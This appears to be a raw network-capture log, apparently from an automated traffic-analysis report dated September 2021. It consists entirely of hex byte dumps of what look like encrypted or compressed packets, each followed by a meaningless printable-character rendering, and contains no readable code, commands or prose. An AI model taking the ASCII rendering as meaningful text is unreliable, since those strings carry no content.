                                              2021-09-28 11:02:14 UTC25INData Raw: f4 51 4c 8c 4e 90 f3 da 18 4b 52 8a 9b 1c f3 14 e6 c0 f4 e3 7d 9c 70 77 46 64 94 6f b0 05 0f 1a 70 3b fc 93 58 ea ab 31 e5 22 51 38 30 9a 5b dd 4b 16 9d d8 42 27 11 3b 00 60 85 cf c0 b4 4f 5a e9 15 09 12 57 59 93 cd b4 66 50 fa 76 aa b9 a8 af 73 f2 c0 27 e7 a4 1b 9b a2 87 b4 18 7a 3b ef 59 a8 94 b0 f1 16 a8 b1 56 31 b8 59 01 b3 40 d0 e5 09 72 69 f0 94 13 57 95 8e d7 99 22 ec 96 0d 14 70 12 d1 5c 7c ec 2b 95 8e 54 6a ff 23 1b 11 5f 77 3b e8 60 73 59 b7 07 dc 92 04 c8 08 c4 c2 ab 76 ae 66 79 e6 ad 5f 33 fa a1 fe 1f 3f e3 45 0b f2 b6 db e1 9b b1 42 57 98 d1 03 79 cc 8b cc d0 a7 3f 45 22 90 36 4e d5 41 53 a5 ad cd 71 53 bf 55 f2 d4 b6 ff 8a 30 5b e5 8b cd 5c 66 7f a8 7c 9a 28 4a c5 1f 42 93 2e 31 da b5 b6 31 d0 91 69 35 d2 c2 0f b1 a0 26 9c df 23 4d bb 41 56
                                              Data Ascii: QLNKR}pwFdop;X1"Q80[KB';`OZWYfPvs'z;YV1Y@riW"p\|+Tj#_w;`sYvfy_3?EBWy?E"6NASqSU0[\f|(JB.11i5&#MAV
                                              2021-09-28 11:02:14 UTC27INData Raw: 4d 7e 3f ce b7 3a 65 90 a7 fc 2b 56 ed 82 22 1c d0 7a 2d 1b d1 86 20 72 8c 58 9c c1 b0 be 4e 90 3d 2c 93 6b 3c 9b 3b 96 a6 da 85 55 d8 e2 5a f9 a6 8e 3e 2b 8b 7e ee 5c ff 44 dd 27 9c 76 4e 2c 1f 61 78 84 ce f2 f3 1a 4d b0 08 35 f3 c1 fc 5e de 84 61 bd 6c af 4e fa 71 b7 05 33 ed 42 f7 20 59 4b 8b 9a 27 99 3c b0 66 27 94 6d b9 c7 19 92 c6 ab d5 d3 97 33 cc 9d fb ee ae 8f bc ee f3 22 d0 3e 99 83 77 c5 8c 15 f5 3c 0b e8 8c 80 1c 1a 3f 99 51 a1 f0 82 c7 1b 02 70 c3 49 69 ce 6a 19 cc 34 80 6e 90 5b fe 04 c4 23 07 6b c3 24 6c 7e 26 84 3c bc 58 2c 2b d4 06 dd ce dd 39 d3 9b 99 e3 bd 44 70 59 a5 71 37 3e 3e e3 67 34 ef b3 1e 0c dc 01 44 43 ce 8c b4 36 28 e7 1a 3c f4 90 22 3e 7a 33 d6 f7 c2 47 9e fd 29 76 74 75 66 b0 06 8c de d0 fd 02 87 73 7c ee 9c ea 3b 35 50 e0
                                              Data Ascii: M~?:e+V"z- rXN=,k<;UZ>+~\D'vN,axM5^alNq3B YK'<f'm3">w<?QpIij4n[#k$l~&<X,+9DpYq7>>g4DC6(<">z3G)vtufs|;5P
                                              2021-09-28 11:02:14 UTC28INData Raw: c6 19 f3 58 0a 5c 50 ec 4b bf 9d 5c 78 dd 26 22 02 42 60 a7 f4 78 8d 59 88 0d db 8d 19 c0 1e f7 d3 ba 6d bd 3a 69 c6 b3 56 33 fa 9d fe 09 b2 c6 56 0c e9 b6 cd f0 87 bc 4a f6 77 dd 07 d5 ca a3 d4 c2 aa 2f ba 24 99 27 43 dc e5 68 af ad dc 60 57 44 20 cc d7 ae f7 9c ee 46 ef 9c dd a5 76 5b cb 2d 8b 27 2f 31 14 53 92 19 59 c9 ae b0 2b c2 fc b4 35 fe c2 0d b3 ab f9 9e d3 53 66 a9 5a 5c 6e 09 1d 71 fd 92 16 bb 81 87 78 b2 ff b7 4d ea c6 bf eb 50 fe e2 eb 4a ad 71 55 9e 2f 50 ed c0 0d e9 e3 06 5c 5f 5b 2e 77 eb 51 29 0c 40 e7 2b e1 4c 2b 80 4a 87 58 62 d2 27 90 0e d3 7b 2f 97 e8 c3 78 64 79 f1 22 f0 cc e0 39 dd d3 b7 37 1d 4e 52 32 cc fd 50 53 d4 3a 0c e8 53 b1 b3 9f 23 c7 4e 8e f9 fc f7 ea 81 f0 1a e9 1d 6c f3 b1 24 1b e9 6d 7b 3a f2 75 b7 87 59 25 cc f4 d8 2b
                                              Data Ascii: X\PK\x&"B`xYm:iV3VJw/$'Ch`WD Fv[-'/1SY+5SfZ\nqxMPJqU/P\_[.wQ)@+L+JXb'{/xdy"97NR2PS:S#Nl$m{:uY%+
                                              2021-09-28 11:02:14 UTC29INData Raw: 23 55 34 47 9a 78 ef 56 80 f2 36 e6 83 aa b9 27 75 22 92 42 82 b7 a4 c6 1b 02 86 91 4e 43 ce 53 4f a1 23 91 7c 98 73 ae b0 c4 25 14 5f c4 48 4f ab 26 84 3c ad 58 0c 6b 8f 25 dd ce df 39 d3 9b 9e dc e4 6c c0 59 a5 7b 98 28 e8 6e 5d 34 ef b2 0d 1a cd 14 57 55 c9 e0 90 34 28 e7 ef 3c f4 b0 9e 67 52 2c db f7 c8 6f be fc 29 7c 67 71 77 a6 aa 96 f6 81 d2 02 81 60 a2 33 8f c2 00 35 50 ea a8 a7 2a 8a 15 90 a3 f3 ce 08 ef 95 9d 79 ee bf 64 84 c8 28 7d 3c c7 46 96 d2 69 47 e0 de c2 8f 09 85 ab 94 9d ba 40 42 e2 b5 97 ae b5 0c f2 db 38 9a 9b 84 24 5b 51 fa b4 ad 75 0d 80 81 83 2b 08 64 89 5a e8 61 78 88 fe 7b d5 21 de f7 a7 9a 14 72 4c 2a d2 c6 3a bd cb b2 61 86 a3 a9 01 ed 42 42 9f 57 88 f8 3f 19 76 4f 8a db ef eb 2b f7 e8 f4 e6 64 68 73 4a 46 77 93 28 9e 05 0f 1a
                                              Data Ascii: #U4GxV6'u"BNCSO#|s%_HO&<Xk%9lY{(n]4WU4(<gR,o)|gqw`35P*yd(}<FiG@B8$[Qu+dZax{!rL*:aBBW?vO+dhsJFw(
                                              2021-09-28 11:02:14 UTC31INData Raw: 69 62 d7 10 48 59 be 11 a0 9f 64 10 b2 ff bc b9 4f ec bf e1 78 a5 fe eb 40 b8 a7 36 b5 7f 6e ed df 09 f6 f0 15 51 5f 11 20 64 99 ae 24 20 4e f6 21 e4 e6 06 91 23 87 52 69 f5 31 83 10 c5 66 0b e9 e1 35 6e b6 5b cc 2b f0 5a c8 20 c4 2d bc cb 01 4c 44 2e f2 eb de e4 f6 27 39 e9 59 a1 cb 8d 2b df ab 9c d2 f0 ff 77 39 f3 85 51 d2 85 28 8a f8 94 ea 2d 7a 3b f3 67 a1 94 5e 3f 23 fa e2 c5 bb b1 bf ac ea f0 98 07 ce 1b d9 48 0d 4d ca d2 6b 42 05 ee 0f 33 e6 30 f7 21 46 7a 11 9e 5e f5 10 57 dd a7 ed d0 92 ad a1 f0 5b f4 72 a5 f7 c9 cd 8f 46 9c a2 a0 02 89 27 48 41 03 c7 86 c5 15 ec 18 0c 3a fd c1 c5 55 96 14 1b 42 5d 25 40 38 4d 90 77 cf 01 be 1b dc 5c ac 5f 7a 23 09 a1 4b 58 3e f5 e4 3c 09 b9 ad 22 3b 73 c5 b5 02 5c 81 55 39 11 f9 be 20 72 76 b9 c5 ef 0b bf 5e 9a
                                              Data Ascii: ibHYdOx@6nQ_ d$ N!#Ri1f5n[+Z -LD.'9Y+w9Q(-z;g^?#HMkB30!Fz^W[rF'HA:UB]%@8Mw\_z#KX><";s\U9 rv^
                                              2021-09-28 11:02:14 UTC32INData Raw: a7 a9 a7 20 a7 01 89 af f3 c0 11 11 94 5a 7e f7 95 8f 8b c8 20 68 c2 c6 6a 81 d5 06 08 f2 ee cd 97 b5 9d bc be bc b6 40 5b e2 58 92 ba 37 1b fe db 30 90 61 9f f6 58 56 f0 96 03 4f f1 8d 9a 90 34 38 77 8d 70 16 60 54 87 fc 72 bf 2b e5 9c 8a b0 40 8a 4c 20 c5 f9 2b bf cd d9 8c 78 a2 8f dc f9 79 71 9f 46 86 c8 f9 18 5a 43 4b bb e0 9d c3 f3 e8 ef 3c 71 be 45 66 4d 7f b2 38 a2 04 05 ce 63 1c e3 b2 4a ed ab 20 fe 3d 43 c6 38 a3 55 d3 40 1d b5 ca 43 27 3a 28 06 56 9a d0 c1 b4 5e 40 ed 30 f5 13 5c 53 82 c6 ae b0 43 f1 6b 91 ab 99 ad 76 86 90 39 19 af 35 85 dc dc af ce 63 32 9f 28 ba 8f ba 3e 01 9f b2 a8 30 9e 63 11 a2 41 da 31 18 5d 06 e7 85 13 5d 86 97 cc ac 27 ed 96 10 15 6f 2b 2e 46 60 e3 58 66 8d 54 6c b0 3c 21 13 46 72 51 12 78 8d 5c b3 77 ca 81 09 be 49 de
                                              Data Ascii: Z~ hj@[X70aXVO48wp`Tr+@L +xyqFZCK<qEfM8cJ =C8U@C':(V^@0\SCkv95c2(>0cA1]]'o+.F`XfTl<!FrQx\wI
                                              2021-09-28 11:02:14 UTC33INData Raw: b5 0d 4b ab 61 ee 29 15 3d c1 04 c4 bc 0a 77 df 65 68 6d 92 9b 47 78 7c 4d c4 27 5e 71 b5 29 76 ed 0a 67 df a1 a5 d9 1c 1a 4b f8 d5 52 ee 24 fc df cd be 87 12 15 7c 22 19 93 60 5f 2a e3 8c c3 35 ff 08 27 3d de cc d7 67 81 06 1a 1d 4e 20 43 2b 48 87 49 f5 06 aa 08 db 5f af 5e ac 78 25 a2 55 6d 3d dd b4 39 16 ba 59 fd 07 4a c5 ab 01 5c 8d 5a 2f 33 fb 85 20 74 79 61 b1 74 21 be 4f b2 f1 3b 45 e0 08 91 28 93 b5 d8 90 5b 37 f0 71 ac 83 9a 16 0d 88 7e e8 64 32 18 f5 38 9c 7d 43 12 17 48 7b 8e cc 78 e3 0e 49 14 60 20 fa d5 e2 6a 41 ba 65 ac 7e a4 5f c4 36 2b 0c 22 e9 d9 23 9d 71 ec 8b 8b 29 ae 32 a5 7b 0f d4 69 a2 3f 0b b9 37 35 c1 fb b1 18 fb 9b e3 69 81 b7 bc ef f2 f8 44 16 be 80 7f e3 2a 92 e2 14 16 90 8f 97 b2 72 36 8c 45 bc b7 3b c6 1b 02 7e 8d 5a 6d c8 68
                                              Data Ascii: Ka)=wehmGx|M'^q)vgKR$|"`_*5'=gN C+HI_^x%Um=9YJ\Z/3 tyat!O;E([7q~d28}CH{xI` jAe~_6+"#q)2{i?75iD*r6E;~Zmh
                                              2021-09-28 11:02:14 UTC34INData Raw: af 5e 5f 0a 07 20 8d 50 2f 24 6d e4 2b f4 7a 06 b2 20 87 5e 4a cd 27 90 15 aa ef 04 f6 e2 d8 68 8b 7e cc 27 fe d1 e7 bf 73 42 1f 1b 13 46 55 33 b5 82 de e4 f6 1b 1e e1 48 a3 d0 cd 2b df ba 9c dc fe fc 0b 62 f3 94 54 d8 74 38 a9 81 c3 c2 6d 71 28 f4 7d b6 e8 07 3f 32 ff e7 35 64 af 99 93 ce ff 98 1c d2 14 d4 bf 20 6b d9 f0 01 82 9b 15 fa d8 f3 4d fa 19 46 78 31 40 4b e1 18 6f 09 79 b2 f5 ba 9a 9d f0 51 f6 4b 90 cc c9 cb ad 50 9c 88 aa 2a 97 65 2c 47 2b e1 86 c5 1f 71 0a 0f 2e 8a c5 d7 51 74 06 1a 54 58 20 52 3d 5b 83 71 dd 07 aa 08 db ca aa 49 52 5f 09 a1 4d d4 38 dd a5 20 09 b3 a7 e6 2b 56 ec 80 02 5c 8b dd 2c 1b d1 c5 20 72 7c a0 c4 e9 21 ba 4e 9a 8a 3b 45 e6 17 9b 3b 97 b5 c9 94 47 c9 3c 5c 95 85 43 3f 2b 8b 71 ee 7c bf 05 f5 38 9c 4c 46 2c 28 60 78 84
                                              Data Ascii: ^_ P/$m+z ^J'h~'sBFU3H+bTt8mq(}?25d kMFx1@KoyQKP*e,G+q.QtTX R=[qIR_M8 +V\, r|!N;E;G<\C?+q|8LF,(`x
                                              2021-09-28 11:02:14 UTC35INData Raw: 82 b6 be ce e4 9b 8a 92 96 3f 07 2c c1 29 8e f0 fa db 5a 77 fb d2 d7 54 db 87 46 4e 25 01 59 8b 4f 79 37 54 87 f6 ae b7 2e a7 8b a1 b2 25 59 4c 21 d3 d5 3e bf da fd 76 62 c7 85 0c f5 51 46 9f 44 8c ee c1 7f 2f 49 9f bb e2 f2 38 e8 d8 e1 e2 fc 96 72 66 00 75 9a 11 b6 0f 7c 71 62 36 e9 be 38 93 aa 20 f4 30 46 ce 35 d9 cd df 5a 17 da e9 42 27 11 3b 08 0c bc dd db be 4d 44 e7 05 e6 15 14 74 83 c6 a4 a1 46 e9 06 95 ab b3 a5 73 ec c7 57 33 a4 37 9b b0 a4 c8 cf 69 3a e3 7d aa 8a df cb 0c b7 8f bb 37 85 4c 38 a6 57 c1 eb 96 c0 69 ca 94 13 57 8d 49 d2 bd 34 98 f2 1d 0f 65 22 40 38 51 e6 52 6b 52 5e 65 d9 3a 28 6d 13 77 2a f9 a4 85 5f f4 17 cb 81 05 fb 1b df c2 bb 71 b7 98 7a ca e5 5d 38 ae 89 e4 1e 3f e9 56 0e e8 ab c0 80 e5 aa 57 6a 66 d0 2f 14 c8 a1 a5 99 a7 39
                                              Data Ascii: ?,)ZwTFN%YOy7T.%YL!>vbQFD/I8rfu|qb68 0F5ZB';MDtFsW37i:}7L8WiWI4e"@8QRkR^e:(mw*_qz]8?VWjf/9
                                              2021-09-28 11:02:14 UTC36INData Raw: a7 bd d4 ba 8c 9d f0 51 8a 2c b9 f4 c3 dd 3d a6 eb a3 aa 20 9b 36 4a 6f 53 e2 86 cf 37 f1 0b 0f 24 f8 ed 42 51 80 00 32 44 4f 20 58 40 0e 83 71 d9 05 d1 5d db 4e af 37 20 78 09 ab 65 07 38 dd af 11 0b 6d be fa 3c 80 e7 84 1d 56 ba f5 f3 15 f4 ae 17 72 7c 6d ce c1 19 be 4e 90 54 3b 6f e6 16 8b 3b 97 b5 c9 94 47 91 a9 5d 9b 9f 8e 3e 2a 21 7c 95 29 bf 1f f1 46 ef 77 44 0e 17 11 79 8e c0 f7 f5 1b 36 e3 67 2c f6 e9 83 73 cc 9f 4d 3b 7f a9 50 f4 22 9f 7f 34 fe 4f 00 ec 46 57 a3 30 23 88 25 36 1f 0f c5 69 a6 db 22 2e 1b 33 df 53 f6 1b fb 99 d1 fa 84 9f af de fa ff e6 3e 99 83 2e e5 88 84 e3 30 00 34 8f 91 10 75 2a 8f af aa b3 9e de 17 08 50 8a b7 68 e4 7e 26 6d 23 91 78 84 7f ae 0c da db 15 52 ca 36 2c 7e 26 80 2b 94 24 0d 6b 85 3a d4 c2 dd 31 c9 65 68 f0 e3 44
                                              Data Ascii: Q,= 6JoS7$BQ2DO X@q]N7 xe8m<Vr|mNT;o;G]>*!|)FwDy6g,sM;P"4OFW0#%6i".3S>.04u*Ph~&m#xR6,~&+$k:1ehD
                                              2021-09-28 11:02:14 UTC38INData Raw: 6e 00 50 8c c6 ae b0 43 ea 59 b9 aa 85 af 62 e9 8c 38 19 b4 1f 2e b2 8c a8 c5 6e 2e 8e 1a bb 8f b4 c8 23 b5 85 ae 18 ba 49 29 a4 2e 17 ee 18 71 01 9d 9b 12 5d 82 e3 85 ac 31 f6 9c c2 05 68 07 29 5a 3f b1 58 b7 86 88 6a df 3c 21 03 54 77 2a f1 78 8b 58 bf 2b ca 8b 0f d1 1b df d9 8a 69 b7 94 7a ca a0 09 22 f1 98 c2 5a 3c e9 50 06 9b 93 c1 e1 80 a1 5a 42 23 d3 2f 70 e2 1a dc d3 a1 11 09 08 92 3c 60 8c 7c 40 b8 85 f8 6a 44 4b 3b e4 d6 ae e6 96 18 0d fd 94 f7 8a de 51 a4 7c a3 04 25 ed 17 6a dd 32 0c cf 86 92 20 cb 85 f8 0e ff c8 14 bd 92 b9 8c d4 3a 6c 11 58 56 64 ff 32 60 f4 b4 39 e0 8b e8 29 9a db bd 91 e8 83 85 ea 50 f5 f9 c3 01 ac 71 bd b6 c6 6c ec ca 25 ca e3 06 54 77 4c 2c 7b 8a 78 01 0c 40 ed 44 c8 7d 2e 8a 24 af 15 61 ea 21 b8 a6 c7 77 02 de cb cb 6f
                                              Data Ascii: nPCYb8.n.#I).q]1h)Z?Xj<!Tw*xX+iz"Z<PZB#/p<`|@jDK;Q|%j2 :lXVd2`9)Pql%TwL,{x@D}.$a!wo
                                              2021-09-28 11:02:14 UTC39INData Raw: 03 df da e4 18 67 a9 77 3f f7 c1 e7 77 d5 6b 64 80 6b af 54 fa 7f b4 05 33 d6 61 2a 8a 53 24 47 8b 23 82 35 a5 7a 0f d4 68 a1 3f 0b b9 12 40 69 d3 97 11 f1 84 e8 e1 86 a6 b9 f1 f5 01 53 12 91 8a 68 33 85 8a f8 2f 3d 92 9e 94 0d 8b 23 b4 54 bd 92 82 d5 1e 08 49 94 56 67 36 78 22 d4 1b f8 7e 98 73 b1 0b d7 20 14 6f c1 57 46 80 27 a8 35 ad 5c 05 f1 83 3a d7 dd d8 39 c2 9e 72 22 e5 40 ef 5b 8d 54 80 29 e2 57 3f cb 10 4d 11 09 c8 14 44 50 d7 1e 96 1a 2e cc 17 23 fd a3 67 65 43 29 c8 fa 36 6e 92 f7 20 6d 61 ff c0 94 c3 8a f8 92 f8 02 90 65 6d ce 8e ee 0f 22 43 ef a8 b6 2f 95 05 6e a2 df ca 23 ea ad ce 84 11 40 93 e8 1b 28 72 36 ed 58 97 e2 6d 46 1b ef c7 8f de 85 ab 85 a5 92 f9 53 f4 a0 98 e5 8f 0c f2 d1 32 8c f0 4d da 5a 77 e1 b3 a4 46 d6 b5 24 91 2f 08 64 83
                                              Data Ascii: gw?wkdkT3a*S$G#5zh?@iSh3/=#TIVg6x"~s oWF'5\:9r"@[T)W?MDP.#geC)6n maem"C/n#@(r6XmFS2MZwF$/d
                                              2021-09-28 11:02:14 UTC40INData Raw: 39 20 d6 92 30 62 ca 7f 41 ae ad dc 6a 44 17 54 5b 0c ae fd 8b 30 4a ff 8f c1 a6 67 6e a4 7a 8b 07 25 ed 0c 40 b9 38 0e a6 67 b6 20 c1 99 a4 36 ea e2 36 2d ba f0 85 fc 7b 45 a8 50 54 0d 4f 11 60 fe aa 07 82 1a e9 2f b8 90 ab 90 e2 e6 b5 35 5e d7 c9 eb 4a a5 65 b1 b6 47 6e ec c6 d3 e9 e5 2c 5e 5f 00 2e 6b 8c 50 25 0c 4e e7 34 df 7c 20 9a 23 87 59 71 da 24 90 4b c4 77 04 ad e8 cb 7e 8c 6b d8 18 ad c1 e0 31 c4 3c b3 06 ed 4d 68 30 cc f2 c0 f7 f9 0f 1c ed 46 a1 41 9e 07 cb b8 a7 b5 ec f5 62 59 6e 94 5e c1 42 f8 a6 f2 96 dd 66 68 3e f9 7d be 99 af 3e 1e fc cc 97 ba 9d bc a4 f0 ec 9d 16 d0 01 de 48 0d 4d c3 fb 46 55 9b 15 fa e0 ec 58 c1 24 46 69 3e 81 51 0b 0a 4b df d4 01 d0 92 a7 b7 ef 4b f6 5f b8 e5 cc d1 59 8f b0 b6 ac 28 bf 4e 4b 47 2d cb a2 c5 1f eb 65 c3
                                              Data Ascii: 9 0bAjDT[0Jgnz%@8g 66-{EPTO`/5^JeGn,^_.kP%N4| #Yq$Kw~k1<Mh0FAbYn^Bfh>}>HMFUX$Fi>QKK_Y(NKG-e
                                              2021-09-28 11:02:14 UTC41INData Raw: 66 f0 53 b7 52 a8 5a eb 6e 4a 1c 78 b3 0d 10 dc 3d 7d 21 ca e0 91 59 b0 e6 1a 36 e5 ba 70 4c 7a 59 d4 f7 ce 47 29 fd 29 76 74 58 5f d0 03 95 f0 ee 65 03 81 6a 6a 3a 9d eb 24 42 53 ea ae 8f bd 8b 15 9a b2 da e0 70 ec 95 70 15 76 be 95 8d d9 22 60 15 ef 3f 8f d2 6f 6e 64 ef c7 85 97 ac 83 ee a4 ba 46 3c 6c a7 93 9c 24 06 e0 f2 10 f0 9c 9e dc 72 ea f3 bd b8 44 f2 a5 e6 93 2f 0e 1a 15 47 16 6a 45 8d ee 5b 97 54 cb 9d a6 9a b8 72 4c 2a de fc 16 c3 d9 b6 70 17 3a 84 02 ff 40 4c 8d 6f a4 9f c2 18 5c 61 02 ba e2 f8 29 da fc 8a 7a 7c 96 78 70 5c 7d 8d da b1 2e 1c 1b 5b 40 e0 b2 4b f9 7b 6a fe 3d 4e ee 25 b6 55 d5 72 69 b4 cb 49 0f 0a 28 0e 75 89 d2 c9 b9 4f 4f 99 15 f7 13 71 7b 15 c7 ae ba 51 f3 41 25 ab b3 a5 b2 a3 df 38 18 8d 23 91 b3 86 86 ce 68 30 fa 13 6d a7
                                              Data Ascii: fSRZnJx=}!Y6pLzYG))vtX_ejj:$BSppv"`?ondF<l$rD/GjE[TrL*p:@Lo\a)z|xp\}.[@K{j=N%UriI(uOOq{QA%8#h0m
                                              2021-09-28 11:02:14 UTC43INData Raw: 7c 90 78 cc 2a f3 3e e1 1d d0 22 b6 33 8a 4d 44 3f c5 ef b4 32 d4 0c 0c e8 53 a1 a3 8c 21 df a1 85 c2 11 f4 48 35 eb 87 54 cb 6a 23 b9 ef 68 c3 41 72 03 a0 6e bb 87 4e 21 21 ff f4 2a b0 82 a0 45 f8 d3 b9 07 c6 10 ed 31 0f 61 ce ef e3 7d 9b 15 f1 d8 f4 50 fa 82 46 78 31 b6 4f f5 0b 6d c6 a2 a2 cd 81 a7 9d e1 51 fc a4 b9 d8 dd c3 c8 fd 9d a2 a0 02 11 27 48 41 44 43 87 c5 15 ec 10 1c 24 ee d4 dd 4e 9a f8 1b 78 42 26 7a 9b 5a 83 7b ce 0f b5 13 c8 44 ab 58 58 63 f7 a0 61 68 30 d5 8d 2c 09 b3 ad 93 8a 57 ed 88 2a 4d 8b 59 27 08 d5 9d 33 78 7c 76 cf f5 df bf 62 d9 9b 3f 6d bc 17 9b 31 d2 b8 c9 94 47 a7 f1 5d 95 10 70 c1 d4 c9 7e ee 7c e6 1e f5 38 15 76 44 04 e9 60 78 8e d4 da e4 19 59 b7 67 2c 33 3f 09 8d 0d 6b 9a 53 be 57 a9 2d e1 49 fa ca 70 ba d5 75 44 58 81
                                              Data Ascii: |x*>"3MD?2S!H5Tj#hArnN!!*E1a}PFx1OmQ'HADC$NxB&zZ{DXXcah0,W*MY'3x|vb?m1G]p~|8vD`xYg,3?kSW-IpuDX
                                              2021-09-28 11:02:14 UTC44INData Raw: 8d 40 05 65 2a 14 fc 72 b5 3a ce 8b b1 b5 40 fb 4d 20 c9 c2 e4 ae ca a5 7f 40 65 85 02 f5 40 41 8e 4f a4 81 c2 18 5c 26 1f ba e2 f4 2b f9 f9 e2 f3 74 be 10 65 4d 73 f5 8a a3 04 09 03 68 27 e5 a6 b5 f0 ba 26 80 ae 4f c6 3b a0 7d f1 5a 1d bf dd bd 26 7b 04 2b 6e 9f f0 fa 9c 19 40 f6 0a e6 14 6a 5a aa a5 ad b0 45 9e e3 bd aa b5 c0 fa e9 df 32 08 a0 1f 26 b3 8c a8 dd 6f 21 fa 51 34 8e b0 ea 20 f4 94 a3 18 1b 4a 29 a8 6c ea fe 1e 5b 30 95 b7 11 5d 80 84 c4 bd 3d e6 9c 73 27 6d 2b 29 4c 5c f7 53 d8 a8 56 6c f3 2d 2d 13 42 18 0c f1 78 8b 49 97 29 45 82 0f d7 74 f5 c0 ba 6b b1 89 74 a5 b5 5c 22 fb a1 c4 1c 3f ef 45 0a 36 aa e5 c9 bd aa 5d 60 75 dd 07 4e ca a3 d4 0d a7 28 23 1f 44 25 41 db 76 51 ae 93 ec 95 bb be 45 d0 c0 78 ff 9f 21 44 ef 9b 7f 15 58 fb 5a 85 74
                                              Data Ascii: @e*r:@M @e@AO\&+teMsh'&O;}Z&{+n@jZE2&o!Q4 J)l[0]=s'm+)L\SVl--BxI)Etkt\"?E6]`uN(#D%AvQEx!DXZt
                                              2021-09-28 11:02:14 UTC45INData Raw: 2a 06 d9 c5 d7 5b 93 08 32 6c 4e 20 58 e3 5b 92 7d ca d1 b9 04 ca 42 ba 5a 6c 85 f7 5e b2 6f 28 ca 73 2e 18 a2 b6 ed 39 d8 5a bd 64 a2 74 a6 2b 31 d1 86 20 73 60 67 c5 e9 21 20 4e 91 23 3b 57 fc 17 9b 3a 97 b5 e4 95 80 3d f0 52 8f 85 8e 3f 38 bb 78 ee e2 bf 1f f5 0d 9d 76 55 12 2c 64 40 01 ca da e4 19 5c b2 7f d2 f3 ed e6 70 42 22 72 76 68 7f db f9 20 b7 04 3f e7 56 2e 8a 48 4f 97 75 22 a4 28 be 68 d9 c9 70 aa c5 0a 84 1f 2e 2b d2 bb 1c f3 94 ca ef 98 a4 b8 ee e8 fb 49 c0 98 af 6e e3 80 97 fd ad 3b 9a 8c 1f a7 28 b3 f9 cd b7 8c 98 c6 0a 0c 41 6f 48 45 c3 6f 0c 53 94 86 a4 95 7f b4 17 c0 25 05 7a de b6 4e 52 23 af ff a7 4b 08 6b 9e 21 ca 30 dc 15 d0 83 7a d8 e4 7d e5 4f 5b 7a ac 2a ff 7d 48 34 fe b6 13 e4 cc 38 57 7e cc d8 fb c9 d7 18 1c 16 f4 b0 79 55 57
                                              Data Ascii: *[2lN X[}BZl^o(s.9Zdt+1 s`g! N#;W:=R?8xvU,d@\pB"rvh ?V.HOu"(hp.+In;(AoHEoS%zNR#Kk!0z}O[z*}H48W~yUW
                                              2021-09-28 11:02:14 UTC47INData Raw: 93 92 e0 03 ad 85 a8 31 94 4b 19 a2 5d 9c ef 16 6d 06 e6 94 08 6d 85 97 94 ac 31 f7 c8 1c 0f 7e 58 95 5d 50 ec 52 b1 f2 7b 6d f5 38 09 15 46 77 2c db 21 8e 58 9d 29 d2 83 0f d7 74 19 c2 ba 67 69 96 5d e2 97 5d 22 fb 85 c2 26 3f e9 5c d2 e8 a3 be ce 8b aa 59 42 71 d2 2f 70 e2 fa dd d3 a1 11 33 0a 92 30 27 0c 7f 40 b4 73 d2 4f 6c 76 54 de dd a3 c4 a9 30 4a f4 4a f1 a4 4d 52 b8 7a 8b 27 25 eb 1d 5e b7 31 02 d3 ae b6 21 cb 8f a7 34 e2 84 1e b4 a0 f0 8f d5 27 74 ab 5a 0a 62 d7 11 3e f4 be 00 d9 32 e8 2f b8 f5 bb ef d2 ed bf ef 78 e8 fc eb 4c 87 2a b8 9e 79 46 f4 ce 0d ef 8c c0 5e 5f 0a f1 75 a9 78 12 0c 40 ed 27 da 44 2e 80 29 59 58 64 94 17 91 1f c1 5f 13 f4 e8 cd 47 c1 7b dd 26 c0 d9 e2 31 c2 42 70 1b 13 46 9a 3b ff d7 e9 e4 fc 05 00 c0 61 ab bf 95 f5 df b6
                                              Data Ascii: 1K]mm1~X]PR{m8Fw,!X)tgi]]"&?\YBq/p30'@sOlvT0JJMRz'%^1!4'tZb>2/xL*yF^_ux@'D.)YXd_G{&1BpF;a
                                              2021-09-28 11:02:14 UTC48INData Raw: a3 17 23 88 25 9e ea 0f c5 67 d6 74 0b 95 11 5c 52 d2 97 11 ec f2 73 e5 86 bd d3 67 f8 ff 58 2d 9c ab d1 e6 88 93 86 b8 39 92 85 99 01 70 0a 03 51 ab 95 b4 69 18 08 5e b9 d2 69 c8 73 26 41 23 91 74 b0 e6 ae 04 ce 4a a1 7f c4 42 20 f9 27 84 36 ab 37 84 6a 8f 2f b2 47 dc 39 d9 88 6d d4 f5 69 c9 c2 a5 7b 8a 01 42 6d 4c 32 c7 29 0d 1a c7 3c c9 55 c9 ea 9c 31 00 d6 1a 3c fe 89 b4 65 52 2c d0 84 45 6e be fa 3a 72 bb 65 52 8e 37 95 f6 8b ee 0d 87 6d 53 08 8f c2 06 e8 ea ea a8 a7 3b 84 3d 3b a0 f3 ce 67 68 94 76 7c c3 bd 93 ad de 39 7c 53 4f 47 8c d4 7e 9c e0 f9 d4 9f be 09 ab 94 a7 ab 4e 42 e4 b1 fc 1f 34 0c f4 c8 29 9a 91 8f ca 40 12 7b bc b2 53 c8 9e 8b 9e 3e 18 6c e2 cf 17 60 52 94 ee 63 ae 01 47 9c a0 b8 02 3b 5d 33 e7 5a 3f bd d0 9b 49 69 b0 ad 8d f4 51 4c
                                              Data Ascii: #%gt\RsgX-9pQi^is&A#tJB '67j/G9mi{BmL2)<U1<eR,En:reR7mS;=;ghv|9|SOG~NB4)@{S>l`RcG;]3Z?IiQL
                                              2021-09-28 11:02:14 UTC49INData Raw: 90 31 b9 fc 1b 5e 83 ad 1d cf b3 a0 bc da 89 89 22 62 d9 18 a5 b3 e6 13 c5 3a 5b a2 4c ca 73 d1 0e 6b e2 22 00 ac 97 e4 39 2e ee bb 8e ef fa 23 fa 56 e0 f0 fd d6 be 77 a4 91 69 f2 fd ca 06 9a ce 07 5e 55 0d 26 6c e3 7a 24 0c 4a ee 3c 9d 55 2f 80 29 8e 5b 65 85 e0 91 1f cf 7b 2c 61 e8 cb 65 92 6c f5 9d eb c0 e6 28 49 2a b6 1b 12 5f 43 24 dd e9 dc 46 ed 08 1a fe d5 94 bf 9f 2a 7d a1 88 cd ed 7b d3 ba cc 94 5e ca d9 38 a1 e1 9e d3 65 6f 2f e0 e1 94 87 51 3e 21 fc e5 32 ac 8a 20 aa f0 e8 8e 8a d0 0d dd a0 90 70 c1 d1 cd 7a 9b 1f e1 c5 f6 d4 fe 00 57 70 2d 04 76 e4 0b 67 df 77 af d0 92 b6 b5 e4 5b e5 50 90 c0 c8 cb ad fa 8e a2 aa 31 69 2f 48 47 5f f1 86 c5 04 8e 1c 0e 2e e4 d6 d3 40 84 12 32 ea 4d 20 54 2a d6 84 71 dd 06 b9 00 ca 46 bd 56 42 f5 36 a1 4d 7f 9b
